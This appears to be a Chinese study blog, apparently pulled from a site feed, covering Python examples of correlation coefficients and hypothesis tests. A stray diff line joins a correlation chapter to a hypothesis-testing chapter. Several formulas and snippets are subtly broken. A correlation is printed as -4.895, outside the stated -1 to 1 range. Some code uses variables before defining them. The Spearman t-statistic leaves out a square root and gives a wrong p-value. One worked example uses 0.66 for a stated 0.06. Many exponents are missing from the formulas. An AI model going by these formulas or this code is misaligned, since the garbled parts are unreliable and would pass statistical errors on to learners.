    $$-1\le \rho_{XY} \le 1$$

    13.3 相关系数的计算与假设检验

    13.3.1 相关系数的计算

    1 矩阵中行数据之间的相关系数的计算和列数据之间的相关系数的计算
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    import numpy as np

    tang = np.array([[10, 10, 8, 9, 7],
    [4, 5, 4, 3, 3],
    [3, 2, 1, 1, 1]])

    print("data source")
    print(tang)

    print("corrcoef between rowdata") # 行数据相关关系矩阵
    print(np.corrcoef(tang))

    print("corrcoef between columndata") # 列数据相关关系矩阵
    print(np.corrcoef(tang, rowvar=0))
    data source[[10 10  8  9  7] [ 4  5  4  3  3] [ 3  2  1  1  1]]corrcoef between rowdata[[1.         0.64168895 0.77174363] [0.64168895 1.         0.53452248] [0.77174363 0.53452248 1.        ]]corrcoef between columndata[[1.         0.9694552  0.9526832  0.9939441  0.97986371] [0.9694552  1.         0.99813671 0.99053606 0.99890611] [0.9526832  0.99813671 1.         0.98031562 0.99419163] [0.9939441  0.99053606 0.98031562 1.         0.99587059] [0.97986371 0.99890611 0.99419163 0.99587059 1.        ]]

    如 corrcoef between rowdata[0][1]或 corrcoef between rowdata[1][0]所表示的是数组第 0 行数据[10, 10, 8, 9, 7]和第一行数据[4, 5, 4, 3, 3]的相关系数 0.64168895

    一组数据和自身的相关系数为 1

    2 理论计算与函数计算之间的比较
    1
    2
    3
    4
    5
    6
    7
    8
    9
    import pandas as pd
    import numpy as np

    df = pd.DataFrame([[3.8, 4, 5.8, 8, 11.3, 14.4,16.5,16.2,13.8,10.8,6.7,4.7],
    [77.7, 51.2, 60.1, 54.1, 55.4, 56.8, 45, 55.3, 67.5, 73.3, 76.6, 79.6]],
    columns=range(1, 13),
    index=["月平均气温 t/°C", "降雨量 p/mm"])
    df.columns.name = "月份"
    df
    月份 1 2 3 4 5 6 7 8 9 10 11 12
    月平均气温 t/°C 3.8 4.0 5.8 8.0 11.3 14.4 16.5 16.2 13.8 10.8 6.7 4.7
    降雨量 p/mm 77.7 51.2 60.1 54.1 55.4 56.8 45.0 55.3 67.5 73.3 76.6 79.6

    伦敦市平均气温 t 与降水量 p 之间的相关系数:
    $$r_{tp}=\frac{\sigma(t,p)}{\sigma(t)\sigma(p)}=-4.895$$

    1
    np.corrcoef(df)
    array([[ 1.        , -0.48949468],       [-0.48949468,  1.        ]])

    13.3.2 相关系数的显著性检验

    10 个学生初一数学分数 X 与初二数学分数 Y 如下表所示, 求它们之间的相关系数, 并从总体角度判断初一和初二数学分数是否存在关联?

    1 计算成绩间的相关系数
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    import pandas as pd
    import numpy as np

    tang = np.array([[74, 71, 72, 68, 76,73,67,70,65,74],
    [76, 75, 71, 70, 76, 79, 65, 77, 62, 72]])
    data = np.array([np.append(data[0], data[0].sum()), np.append(data[1], data[1].sum())])
    c = list(range(1, 11))
    c.append("总和")
    df = pd.DataFrame(data, columns=c, index=["X", "Y"])
    df.columns.name = "序号"
    df
    序号 1 2 3 4 5 6 7 8 9 10 总和
    X 74 71 72 68 76 73 67 70 65 74 710
    Y 76 75 71 70 76 79 65 77 62 72 723
    1
    np.corrcoef(tang)
    array([[1.       , 0.7802972],       [0.7802972, 1.       ]])

    得到相关系数: $r = 0.7802972$

    2 构建假设检验确定总体数据间是否存在关联

    根据样本数据提出总体的一个假设

    假设$H_0:\rho=0,H_1:\rho\ne0$

    对于成对数据的检验, 一般用 t 检验, 构建检验统计量

    相关系数的检验

    escorc

    The Pearson linear correlation coefficient ® for n pairs of independent observations can be tested against the null hypothesis (ie.: >no correlation) using the statistic

    t = r*sqrt[ (n-2)/(1-r^2) ]

    This statistic has a Student-t distribution with n-2 degrees of freedom.(此统计量具有具有 n-2 个自由度的学生 t 分布)

    $$t=\frac{r\sqrt{n-2}}{\sqrt{1-r2}}=\frac{0.7803\sqrt{10-2}}{\sqrt{1-0.78032}}=3.5289$$

    $$t=3.5289>3.3554=t_{\alpha/2}(n)=t_{0.005}(8)$$

    在显著水平$\alpha=0.01$的情况下, 采用$t$双边检验, 可以得到相关系数$\rho\ne0$, 即在显著水平 0.01 下, 初一数学成绩和初二成绩之间存在显著的相关关系

    1
    2
    3
    4
    5
    6
    from scipy.stats import t

    r = np.corrcoef(tang)[0][1]
    t_value = r * np.sqrt(10 - 2) / np.sqrt(1 - r ** 2)
    print("相关系数: ", t_value, '>', t.ppf(1 - 0.005, 8))
    print("显著性水平: ", 2 * (1 - t.cdf(t_value, 8)), '<', "0.01")
    相关系数:  3.52891333162547 > 3.3553873313333957显著性水平:  0.007744294734007395 < 0.01
    1
    2
    3
    4
    5
    import scipy.stats as stats

    cor, pv = stats.pearsonr(tang[0], tang[1])
    print("cor =", cor)
    print("pv =", pv)
    cor = 0.7802972005173809pv = 0.007744294734007256

    cor 即为两组数据之间的相关系数
    pv 为显著性水平

    例 13.4

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    import numpy as np
    import scipy.stats as stats
    import matplotlib.pyplot as plt
    # https://docs.scipy.org/doc/scipy-0.19.1/reference/stats.html#module-scipy.stats

    # data source
    x = [10.35, 6.24, 3.18, 8.46, 3.21, 7.65, 4.32, 8.66, 9.12, 10.31]
    y = [5.1, 3.15, 1.67, 4.33, 1.76, 4.11, 2.11, 4.88, 4.99, 5.12]

    # compute correlation and pvalue
    correlation,pvalue = stats.pearsonr(x,y)
    print ('correlation',correlation)
    print ('pvalue',pvalue)

    # create figure and configuring
    plt.figure(figsize=(8,5), dpi=80)
    plt.subplot(111)

    # plotting the scatter figure
    plt.scatter(x,y,color='red')

    # 绘制回归直线
    x = np.linspace(2, 11, 2)
    y = 0.5115 * x + 0.0649 # 这个值是计算器算的..
    plt.plot(x, y, color="blue", alpha=0.2)

    plt.show();
    correlation 0.9891763198690562pvalue 5.926875946481136e-08

    png

    13.4 斯皮尔曼等级相关

    13.4.1 皮尔森相关系数的局限性

    对于非线性关系, 相关性的检测功效会下降

    13.4.2 斯皮尔曼等级相关系数

    【数据科学】斯皮尔曼的等级相关系数(Spearman’s coefficient)

    1 斯皮尔曼等级相关系数的表示

    斯皮尔曼等级相关主要用于解决名称数据和顺序数据相关的问题.当两个变量值以等级次序排列或以等级次序表示时, 两个相应的总体并不一定呈正态分布, 样本容量也不一定大于 30, 这种情况下可以用斯皮尔曼等级相关来描述两个变量之间的相关关系.

    $$r_s=1-\frac{6\Sigma d2_i}{n3-n}$$

    $n$为等级个数, $d$为二列成对变量的等级差数

    • 无论两个变量的数据如何变化, 符合什么样的分布, 我们只关心每个数值在变量内的排列顺序(秩)

    • 当每个变量是另一个的完美单调函数时,发生+1 或-1 的完美斯皮尔曼相关

    • 数据中出现了有相同等级的数据,一般对于有相同等级的数据的个体用所占有的平均等级作为它们的共同等级,比如有两个数据大小相同,分别占据 5,6 等级,则将 5.5 作为它们的共同等级

    3 斯皮尔曼等级相关系数显著性检验

    $$t=\frac{r_s\sqrt{n-2}}{\sqrt{1-r^2_s}}$$

    4 应用 Python 函数库计算斯皮尔曼等级相关系数
    1 直接计算斯皮尔曼等级相关系数
    1
    2
    3
    4
    5
    import numpy as np
    import scipy.stats as stats

    x = [10.35, 6.24, 3.18, 8.46, 3.21, 7.65, 4.32, 8.66, 9.12, 10.31]
    y = [5.1, 3.15, 1.67, 4.33, 1.76, 4.11, 2.11, 4.88, 4.99, 5.12]
    1
    2
    3
    correlation, pvalue = stats.spearmanr(x, y)
    print('correlation:', correlation)
    print('pvalue:', pvalue)
    correlation: 0.9878787878787878pvalue: 9.307459988955517e-08
    2 先将原始数据转换成等级数据, 再计算斯皮尔曼等级相关系数
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    import numpy as np
    import scipy.stats as stats

    x = [10.35, 6.24, 3.18, 8.46, 3.21, 7.65, 4.32, 8.66, 9.12, 10.31]
    y = [5.1, 3.15, 1.67, 4.33, 1.76, 4.11, 2.11, 4.88, 4.99, 5.12]
    # rankdata () 函数将数组作为输入参数,对数组内的每个元素进行排序,并以另一个相同长度的数组的形式返回结果。
    x = stats.rankdata(x)
    y = stats.rankdata(y)
    print(x)
    print(y)
    correlation, pvalue = stats.spearmanr(x, y)
    print('correlation:', correlation)
    print('pvalue:', pvalue)
    [10.  4.  1.  6.  2.  5.  3.  7.  8.  9.][ 9.  4.  1.  6.  2.  5.  3.  7.  8. 10.]correlation: 0.9878787878787878pvalue: 9.307459988955517e-08

    用等级数据计算得到的斯皮尔曼相关系数和显著性水平与原始数据计算得到的数据相同

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    from scipy.stats import t
    import numpy as np
    import scipy.stats as stats

    x = [10.35, 6.24, 3.18, 8.46, 3.21, 7.65, 4.32, 8.66, 9.12, 10.31]
    y = [5.1, 3.15, 1.67, 4.33, 1.76, 4.11, 2.11, 4.88, 4.99, 5.12]
    x = stats.rankdata(x)
    y = stats.rankdata(y)

    correlation = 1 - (6 * ((x - y) ** 2).sum()) / (n ** 3 - n)

    n = len(x)
    r_s = 1 - (6 * ((x - y) ** 2).sum()) / (n ** 3 - n)
    t_value = r_s * np.sqrt(n - 2) / (1 - r_s ** 2)
    pvalue = 2 * (1 - t.cdf(t_value, n - 2))

    print('correlation:', correlation)
    print('pvalue:', pvalue)
    correlation: 0.9878787878787879pvalue: 3.419486915845482e-14

    13.5 肯德尔系数

    描述 K 个评分这对 N 个对象评价的一致性

    13.5.3 肯德尔相关系数的显著性检验

    1
    2
    3
    4
    5
    6
    7
    8
    import scipy.stats as stats

    x1 = [10, 9, 8, 7, 6]
    x2 = [10, 8, 9, 6, 7]

    tau, p_value = stats.kendalltau(x1, x2)
    print("tau", tau)
    print("p_value", p_value)
    tau 0.6p_value 0.23333333333333334

    说明等级数据 x1 和 x2 的肯德尔相关系数为 0.6, 其显著性水平约为 0.233, 二者呈现出较弱的一致性

    13.6 相关分析

    相关分析也是研究两个变量之间的相关关系的分析方法, 其中

    一个变量描述事物总体的性或特点, 如男与女, 优与劣, 及格与不及格等(一般是离散的形式)

    另一个变量以数形式描述事物的具体性质, 如智商, 学科分数, 身高, 体重等

    这两个变量之间的相关关系就是质量相关

    13.6.1 二列相关

    1 二列相关的数学定义

    当两个变量都是正态连续变量, 其中一个变量被人为地划分成二分变量

    $$R=\frac{\bar{X_p}-\bar{X_q}}{\sigma}*\frac{pq}{Y}$$

    变量含义
    $p$二分变量中某一类别频率的比率
    $q$二分变量中另一类别频率的比率
    $\bar{X_p}$二分变量中$p$类别相对应的连续变量的平均值
    $\bar{X_q}$二分变量中$q$类别相对应的连续变量的平均值
    $\sigma$连续变量的标准差
    $Y$正态曲线中累积概率$p$相对应的概率密度函数值

    $$Y = \frac{1}{\sqrt{2\pi}}e{-\frac{x2}{2}}$$

    2 二列相关实例

    例 13.10

    某次考试中, 有 10 名考生的成绩如下表所示, 包含总分和一道问答题, 试求该道问答题的区分度(该问答题得分与卷面总分的相关度)(人为规定问答题$\ge$6 为通过, 否则为未通过)

    1
    2
    3
    4
    5
    6
    7
    8
    9
    import pandas as pd
    import numpy as np
    from scipy.stats import norm

    data = np.array([[75, 57, 73, 65, 67, 56, 63, 61, 65, 67],
    [7, 6, 7, 4, 7, 4, 4, 4, 7, 6]])
    df = pd.DataFrame(data, columns=range(1, 11), index=["卷面总分", "问答题总分"])
    df.columns.name = "考生"
    df
    考生 1 2 3 4 5 6 7 8 9 10
    卷面总分 75 57 73 65 67 56 63 61 65 67
    问答题总分 7 6 7 4 7 4 4 4 7 6

    由于问答题以 6 分为界进行区分, 由样本数据确定$p=0.60, q=0.40$

    1
    2
    3
    4
    p = np.array(np.where(data[1] >= 6)).size / len(data[1])
    q = np.array(np.where(data[1] < 6)).size / len(data[1])
    print("p:", p)
    print("q:", q)
    p: 0.6q: 0.4

    当$p=0.6$时, 查正态分布表得到连续随机变量$x=0.25$

    1
    2
    x = norm.ppf(p)
    print("x:", x)
    x: 0.2533471031357997

    当$x=0.25$时, 代入标准正态分布函数$Y = \frac{1}{\sqrt{2\pi}}e{-\frac{x2}{2}}$

    得到$Y=0.3866$

    1
    2
    Y = norm.pdf(x)
    print("Y:", Y)
    Y: 0.38634253349686054

    根据问答题得分分类, 计算卷面总分相应类比的平均数及样本均方差

    $\bar{X_p}=67.33, \bar{X_q}=61.25, \sigma=6.12$

    1
    2
    3
    4
    5
    6
    X_p_bar = data[0][np.where(data[1] >= 6)].mean()
    X_q_bar = data[0][np.where(data[1] < 6)].mean()
    sigma = data[0].std(ddof=1)
    print("X_p_bar:", X_p_bar)
    print("X_q_bar:", X_q_bar)
    print("std:", sigma)
    X_p_bar: 67.33333333333333X_q_bar: 61.25std: 6.118278625016463

    通过公式计算得到二列相关系数

    $$R=\frac{\bar{X_p}-\bar{X_q}}{\sigma}\frac{pq}{Y}=\frac{67.33-61.25}{6.12}\frac{0.6*0.4}{0.3866}\approx0.62$$

    1
    2
    R = (X_p_bar - X_q_bar) / sigma * p * q / Y
    R
    0.617662281919257

    从二列相关系数的值, 可以看到问答题得分对总分的区分度略高

    13.6.2 点二列相关

    质量分析中用来描述事物总体性质的离散变量, 如果其性质本身就具有离散性质, 而不是人为地将连续变量划分成为连续变量, 这时候的相关关系称为点二列相关.

    $$R=\frac{\bar{X_p}-\bar{X_q}}{\sigma}*\sqrt{pq}$$

    13.6.3 Python 对点二列相关的支持

    1
    2
    3
    4
    5
    6
    7
    import scipy.stats as stats

    x = [1,0,0,0,0,0,0,1,1,1,1,0,1,1,1,1,1,0,0,0]
    y = [84,82,76,60,72,74,76,84,88,90,78,80,92,94,96,88,90,78,76,74]
    coef,pvalue=stats.pointbiserialr(x, y)
    print('pointbiserialcorrcoef',coef)
    print('pvalue',pvalue)
    pointbiserialcorrcoef 0.7849870641173373pvalue 4.145927973490357e-05
    • 点二列相关系数约为 0.785, 说明两组数据具有较好的一致性

    • 输出的显著性水平的值很小, 表示相关系数具有统计学意义

    13.7 品质相关分析

    如果两个变量都是用来描述事物的综合性质且都是划分成几种类别来表示, 则称这两个变量之间的相关关系为品质相关

    有两种不同的品质相关: 列连相关和$\varphi$相关

    13.7.1 列连相关系数

    1 列连相关系数的数学表示
    • 当至少一个变量被分成两个以上类别, 则这两个变量之间的相关程度可用列连相关系数来测度.

    • 假设变量$x$被分成$a$个类别, $y$被分成$b$个类别, 而且$a$和$b$至少有一个大于 2, 此时变量$x$与变量$y$的列连相关系数记为 C

    • 记$m_{ij}$为观察数据属于变量$x$的第$i$个类别$(i=1,2,…,a)$, 变量$y$的第$j$类别$(j=1, 2, …, b)$的频数

    $$a_i=\Sigma^b_{j=1}m_{ij},i=1, 2, …, a$$

    $$b_j=\Sigma^a_{j=1}m_{ij},i=1, 2, …, b$$

    构造统计量:

    $$\chi2=N(\Sigma\Sigma\frac{m2_{ij}}{a_ib_j}-1)$$

    其中$N=\Sigma\Sigma m_{ij}$, 这样可以得到列连相关系数$C$的计算公式

    $$C=\sqrt{\frac{\chi2}{N+\chi2}}$$

    对于列连相关, 可以用卡方检验进行总体性质推断, 若卡方检验显著, 则列连相关系数也显著

    2 列连相关系数的计算实例

    计算调查对象和态度之间的列连相关系数, 并进行显著性检验

    调查对象/态度赞成不置可否反对总计
    低年级学生446212319977
    高年级学生273193324790
    教师262325177764
    总计9817308202531

    $\chi2=N(\Sigma\Sigma\frac{m2 _ {ij}}{a _ ib _ j}-1) \approx130.02$

    $C=\sqrt{\frac{\chi2}{N+\chi2}}=\sqrt{\frac{130.2}{2531+130.2}}=0.221$

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    import numpy as np

    data = np.array([[446, 212, 319],
    [273, 193, 324],
    [262, 325, 177]])
    N = data.sum()
    Sum = 0
    for a in range(data.shape[0]):
    for b in range(data.shape[1]):
    Sum += (data[a][b] ** 2) / (data[a].sum() * data.T[b].sum())
    chi_square = N * (Sum - 1)
    C = np.sqrt(chi_square / (N + chi_square))
    print("chi_square:", chi_square)
    print("C:", C)
    chi_square: 130.0172447754466C: 0.22104293310887424
    1
    2
    3
    from scipy.stats import chi2

    chi2.isf(0.01, 4)
    13.276704135987625

    因为$\chi^2=130.02>13.277$, 所以求得系数$C=0.221$具有显著意义

    13.7.2 $\varphi$相关

    1 $\varphi$相关系数的数学定义

    当两个变量都是二分变量, 则这两个变量之间的相关系数称为$\varphi$相关系数

    A 和 B 的 2x2 列连$B_1$$B_2$合计
    A_1aba+b
    A_2cdc+d
    合计a+cb+dN=a+b+c+d

    则 A 和 B 的$\varphi$系数的计算公式可以表示为:

    $$r_\varphi=\frac{ad-bc}{\sqrt{(a+b)(a+c)(b+d)(c+d)}}$$

    $$\chi2=\frac{N(ad-bc)2)}{(a+b)(a+c)(b+d)(c+d)}$$

    易证:

    $$r_\varphi=\pm\sqrt{\frac{\chi^2}{N}}$$

    (正负号由$ad-bc$的值决定)

    2 $\varphi$相关系数的应用
    R/C肯定否定合计
    男生2288110
    女生184260
    合计40130170

    $$\chi2=\frac{N(ad-bc)2)}{(a+b)(a+c)(b+d)(c+d)}=2.1577$$

    $$\because ad-bc>0$$

    $$\therefore r_\varphi>0$$

    $$r_\varphi=\sqrt{\frac{\chi^2}{N}}=0.1127$$

    $$\chi2<\chi2_{0.05}(1)=3.84$$

    所以求得的$\varphi$相关系数不具有统计显著意义

    13.8 偏相关与复相关

    13.8.1 偏相关

    多要素所构成的系统中, 先不考虑其他要素的影响, 单独研究两个要素之间的相互关系的密切程度

    1 一阶偏相关系数

    控制 3, 计算 1 和 2 的净影响

    $$r_{12,3}=\frac{r_{12}-r_{13}r_{23}}{\sqrt{(1-r2_{13})(1-r2_{23})}}$$

    3 组变量共有$C^2_3=3$个一阶偏相关系数

    2 二阶偏相关系数

    $$r_{12,34}=\frac{r_{12,3}-r_{14,3}r_{24,3}}{\sqrt{(1-r2_{14,3})(1-r2_{24,3})}}$$

    4 组变量共有$C^2_4=6$个二阶偏相关系数

    13.8.2 复相关

    $$R_{y,12}=\sqrt{1-(1-r2_{y1})(1-r2_{y2,1})}$$

    $$R_{y,123}=\sqrt{1-(1-r2_{y1})(1-r2_{y2,1})(1-r^2_{y3,12})}$$

    • 反映几个要素与某一个要素之间的复相关程度, 复相关系数介于 0~1

    • 复相关系数越大, 表明变量之间的相关程度越密切, 复相关系数为 1, 表示完全相关, 为 0, 表示不相关

    • 复相关系数必≥单相关系数的绝对值

    • 复相关系数必≥同一系列数据所求得的偏相关系数的绝对值, 即$R_{1,23}\ge|r_{12,3}|$

    ]]>
    @@ -10023,7 +10023,7 @@ /posts/Python-%E4%BA%BA%E5%B7%A5%E6%99%BA%E8%83%BD%E6%95%B0%E5%AD%A6%E5%9F%BA%E7%A1%8012/ - 正文:4 应用篇

    12 假设检验

    12.1 假设检验的基本概念

    12.1.1 假设检验的基本思想

    根据实际情况的要求对检验对象提出一个假设$H_0$(称为原假设), 同时提出一个与原假设对立的备设假设$H_1$

    $P\{\color{Red}Z\in \color{Blue}W|H_0$为真$\}\le \color{Green}\alpha (\alpha$很小$)$

    $\color{Red}Z$: 检验统计量

    $\color{Blue}W$: 区域

    $\color{Green}\alpha$: 显著性水平

    例 12.1

    已知某炼铁厂的铁水含碳量$X\sim N(4.55, 0.06)$, 现改变了工艺条件, 又测得 10 种贴水的平均含碳量$\bar X = 4.57$, 假设方差无变化, 问总体均值$\mu$是否有明显改变?

    设$H_0:\mu=4.55,H_1:\mu\ne4.55$

    令事件$A:|\bar X-4.55|\ge d,d>0, \alpha=0.05$得到不等式:

    $P($当$H_0$为真, 拒绝$H_0)=P(|\bar X -4.55|\ge d)\le \alpha$

    $P($当$H_0$为真, 拒绝$H_0)=P(|\frac{\bar X -4.55}{\sigma/\sqrt n}|\ge \frac{d}{\sigma/\sqrt n})\le \alpha$

    若 X 的样本观察值满足:

    $|Z|=|\frac{\bar X -4.55}{\sigma/\sqrt n}| < k\Rightarrow $接受$H_0$

    $|Z|=|\frac{\bar X -4.55}{\sigma/\sqrt n}| \ge k\Rightarrow $拒绝$H_0$($H_0$的拒绝域)

    $k = Z_{\alpha/2}$

    由$\alpha=0.05$得$Z_{\alpha/2}=1.96$

    $Z=\frac{4.57-4.55}{0.66/\sqrt{10}}, |Z|<Z_{\alpha/2}$, 认为接受原假设$H_0$, 认为工艺是正常的

    import numpy as np
    from scipy.stats import norm

    mu = 4.55
    sigma = 0.06
    X_bar = 4.57
    n = 10
    alpha = 0.05
    Z_alpha_div_2 = norm.ppf(1 - alpha / 2)
    Z = (X_bar - mu) / (sigma / np.sqrt(n))
    Z, Z_alpha_div_2
    (1.054092553389484, 1.959963984540054)
    import matplotlib.pyplot as plt
    from scipy.stats import norm
    import numpy as np

    alpha = 0.05
    plt.plot(np.linspace(-3, 3, 100), norm.pdf(np.linspace(-3, 3, 100))) # 绘制曲线
    plt.fill_between(np.linspace(-3, norm.ppf(alpha / 2), 50),
    norm.pdf(np.linspace(-3, norm.ppf(alpha / 2), 50)),
    alpha=.15, color="red", label="Rejection region |Z|>k")
    plt.fill_between(np.linspace(norm.ppf(1 - alpha / 2), 3, 50),
    norm.pdf(np.linspace(norm.ppf(1 - alpha / 2), 3, 50)),
    alpha=.15, color="red")
    plt.fill_between(np.linspace(norm.ppf(alpha / 2), norm.ppf(1 - alpha / 2), 50),
    norm.pdf(np.linspace(norm.ppf(alpha / 2), norm.ppf(1 - alpha / 2), 50)),
    alpha=.15, color="blue", label="Acceptance region |Z|<= k")
    plt.legend()
    plt.show() # 显示图片

    png

    12.1.2 左右侧检验与双侧检验

    • 左侧检验: $H_0:\mu\ge\mu_0($或$\mu=\mu_0),H_1:\mu<\mu_0$, 拒绝域: $Z\le-Z_\alpha$

    • 右侧检验: $H_0:\mu\le\mu_0($或$\mu=\mu_0),H_1:\mu>\mu_0$, 拒绝域: $Z\ge Z_\alpha$

    • 双侧检验: $H_0:\mu=\mu_0,H_1:\mu\ne\mu_0$, 拒绝域: $|Z|\ge Z_\alpha$

    12.1.3 P 值检验法

    以上为临界值检验法,下面介绍 P 值检验法,所谓 P 值检验法就是由检验统计量的样本观察值得出的原假设可被拒绝的最小显著性水水平。

    数学基础-概率论 05(统计推断-分布拟合检验)

    png

    例 12.3

    某食品厂用自动装罐机装罐头食品, 每罐的标准重量$\mu_0=500g$

    设罐重是服从正态分布的随机变量, 标准差$\sigma=10$

    从中抽取$n_1 =10$罐, 测得平均重量为$\bar X_1=506g$

    隔一段时间后又抽$n_1=10$罐, 测的平均重量为$\bar X_2=505g$

    问这时机器工作是否正常?

    提出假设$H_0:\mu=\mu_0=500,H_1:\mu\ne\mu_0$

    取$\alpha=0.05$

    $Z_1=\frac{506-500}{10/\sqrt{10}}=1.897, Z_2=\frac{505-500}{10/\sqrt{10}}=1.581$

    $P{Z\ge Z_1}=P{Z\ge 1.897}=1-\Phi(1.897)=0.029>\frac{\alpha}{2}=0.025$

    $P{Z\ge Z_2}=P{Z\ge 1.581}=1-\Phi(1.581)=0.057>\frac{\alpha}{2}=0.025$

    接受原假设$H_0$, 第二次抽样支持原假设的强度更大

    12.2 Z 检验(正态总体均值的假设检验, 方差已知时)

    $\bar X\sim N(\mu_0, \frac{\sigma^2}{n})$当$H_0$真实时$Z=\frac{\bar X -\mu}{\sigma/\sqrt n}\sim N(0,1)$

    若两组样本方差$\sigma2_1$和$\sigma2_2$已知, 统计量$Z$的计算公式:

    $$Z=\frac{\bar X_1 - \bar X_2}{\sqrt{\frac{\sigma2_1}{n_1}+\frac{\sigma2_2}{n_2}}}\sim N(0,1)$$

    12.3 t 检验(正态总体均值的假设检验, 方差未知时)

    由于总体方差未知, 用样本标准差$S$代替$Z$检验法中的总体标准差$\sigma$

    $$T=\frac{\bar X - \mu_0}{S/\sqrt n}\sim t(n-1)$$

    若有两种独立样本, 选取统计量

    $$T=\frac{(\bar X - \bar Y)-(\mu_1-\mu_2)}{S_w\sqrt{\frac{1}{n_1}+\frac{1}{n_2}}}$$

    其中

    $$S_w=\sqrt{\frac{(n_1-1)S2_1+(n_2-1)S2_2}{n_1+n_2-2}}$$

    12.4 卡方检验

    未知总体的分布的假设检验(非参数检验)$\chi^2$拟合检验法

    其基本思想是用得到的样本观察值来与假设的总体的分布函数(或分布律)来进行某种拟合, 再根据拟合的程度确定是否接受原假设, 从而推断总体是否服从假设的分布.

    设总体$X$的分布函数$F(x)$未知, $X_1,X_2,…,X_n$是来自总体$X$的一个样本, 建立假设检验

    $H_0:F(x)=F_0(x), H_1:F(x)\ne F_0(x)$, 其中$F_0(x)$是已知的分布函数

    皮尔逊定理

    若$n$充分大(一般$n\ge 50$), 则当$H_0$为真时, 无论总体 X 服从何种分布

    统计量$\chi2=\Sigmak_{i=1}\frac{(n_i-np_i)2}{np_i}$都近似服从$\chi2(k-r-1)$,$r$是分布中未知参数的个数

    例 12.12

    某市自开办有奖储蓄以来, 13 期兑奖中各数码的频数汇总如下表所示

    数码$i$0 1 2 3 4 5 6 7 8 9总数
    频数$f_i$21 28 37 36 31 45 30 37 33 52350

    如果检验器械或操作方法没有问题, 则各数码服从均匀分布, 提出检验假设$H_0:p_i=\frac{1}{10},i=0,1,2,…,9$理论频数$np_i=35$,

    统计量$\chi2=\Sigma{10}_{i=1}\frac{(n_i-np_i)^2}{np_i}=\frac{688}{35}=19.657$

    而$\chi^2_\alpha(k-1)=16.9,19.657>16.9$拒绝$H_0$, 认为器械操作方法有问题

    12.5 假设检验中的两类错误

    决策结果\实际情况$H_0$为真$H_0$为假
    拒绝$H_0$弃真(第一类错误)取伪(无错)
    接受$H_0$存真(无错)取伪(第二类错误)

    $P{Z\in W|H_0 is true}\le \alpha$

    $P{Z\notin W|H_0 is not true}=\beta$

    在假设检验中, 通常是要求犯第一类错误的概率不超过预定的数$\alpha$(如 0.05, 0.01 等), 同时希望犯第二类错误的概率尽可能小

    12.6 综合实例 1——体检数据中的假设检验问题

    变量名描述
    Temperature体温(华氏温度)
    Gender性别(1 为男, 2 为女)
    Heart Rate心率(每分钟心跳次数)

    (1)显示数据集及相关统计描述信息(均值, 标准差等)

    import pandas as pd
    import pylab
    import math
    import numpy as np
    import matplotlib.pyplot as plt
    import numpy as np
    from scipy.stats import norm
    import scipy.stats
    import warnings
    warnings.filterwarnings('ignore')

    df = pd.read_csv('normtemp.txt', sep=' ', names=['Temperature', 'Gender', 'Heart Rate'])
    df.describe()
    Temperature Gender Heart Rate
    count 130.000000 130.000000 130.000000
    mean 98.249231 1.500000 73.761538
    std 0.733183 0.501934 7.062077
    min 96.300000 1.000000 57.000000
    25% 97.800000 1.000000 69.000000
    50% 98.300000 1.500000 74.000000
    75% 98.700000 2.000000 79.000000
    max 100.800000 2.000000 89.000000

    分别显示了各属性的总数, 均值, 标准差, 最大值和最小值, 以及各种分位点值

    df.head()
    Temperature Gender Heart Rate
    0 96.3 1 70
    1 96.7 1 71
    2 96.9 1 74
    3 97.0 1 80
    4 97.1 1 73

    (2) 试检验体温的分布是否服从正态分布

    这里用的跟之前书上讲的根本就不是一个方法…

    正态检验 (Normality Test)——常见方法汇总与简述

    png

    有多种手段评估数据是否正态分布。分两大类:图形和统计量。图形手段包括 q-q plot 和 p-p plot,统计量手段包括 Kolmogorov-Smirnov 检验 and Shapiro-Wilks 检验。

    Samuel Shapiro 和 MartinWilk 于 1965 年提出了 Shapiro–Wilk 检验。他们观察到 Normal probability plot 与线性回归很类似。Normalprobability plot 是 q-q plot 的特例,检查样本数据集是否匹配某正态分布,比如标准正态分布 N(0,1)。

    1.直方图初判
    observed_temperatures = df['Temperature'].sort_values()
    bin_val = np.arange(start= observed_temperatures.min(), stop= observed_temperatures.max(), step = .05)
    mu, std = np.mean(observed_temperatures), np.std(observed_temperatures)
    p = norm.pdf(observed_temperatures, mu, std)
    plt.hist(observed_temperatures,bins = bin_val, density=True, stacked=True)
    plt.plot(observed_temperatures, p, color = 'red')
    plt.xticks(np.arange(95.75,101.25,0.25),rotation=90)
    plt.xlabel('Human Body Temperature Distributions')
    plt.xlabel('human body temperature')
    plt.show()
    print('Average (Mu): '+ str(mu) + ' / ' 'Standard Deviation: '+str(std))

    png

    Average (Mu): 98.24923076923076 / Standard Deviation: 0.7303577789050376
    2.利用 Scipy 工具检验正态性
    # Shapiro-Wilk Test: https://en.wikipedia.org/wiki/Shapiro%E2%80%93Wilk_test
    """
    语法:scipy.stats.shapiro(x, a=None, reta=False)
    x 为待检验的数据
    返回(统计数, P 值)
    """
    shapiro_test, shapiro_p = scipy.stats.shapiro(observed_temperatures)
    print("Shapiro-Wilk Stat:",shapiro_test, "\nShapiro-Wilk p-Value:", shapiro_p)
    """
    语法 scipy.stats.normaltest(a, axis=0, nan_policy='propagate')
    a 是待检验数据
    axis 正态分布测试将沿其计算的轴
    返回:(对数据集进行假设检验的 k2 值, P 值)
    """
    k2, p = scipy.stats.normaltest(observed_temperatures)
    print('p:',p)
    Shapiro-Wilk Stat: 0.9865769743919373 Shapiro-Wilk p-Value: 0.2331680953502655p: 0.2587479863488212
    3.通过分位数-分位数(Q-Q)图检查正态分布
    # stats.probplot(QQ 图)
    scipy.stats.probplot(observed_temperatures, dist="norm", plot=pylab)
    pylab.show()

    png

    4.基于 ECDF(经验累积分布函数)正态检验

    根据当前样本的均值和标准差随机生成一个新的正态分布, 然后将它的累积分布函数和样本数据的累积分布函数比较, 如果实测差异足够大, 该检验将拒绝总体呈正态分布的原假设

    def ecdf(data):
    """Compute ECDF"""
    n = len(data)
    x = np.sort(data)
    y = np.arange(1, n+1) / n
    return x, y

    # Compute empirical mean and standard deviation 计算经验平均值和标准差

    # Number of samples
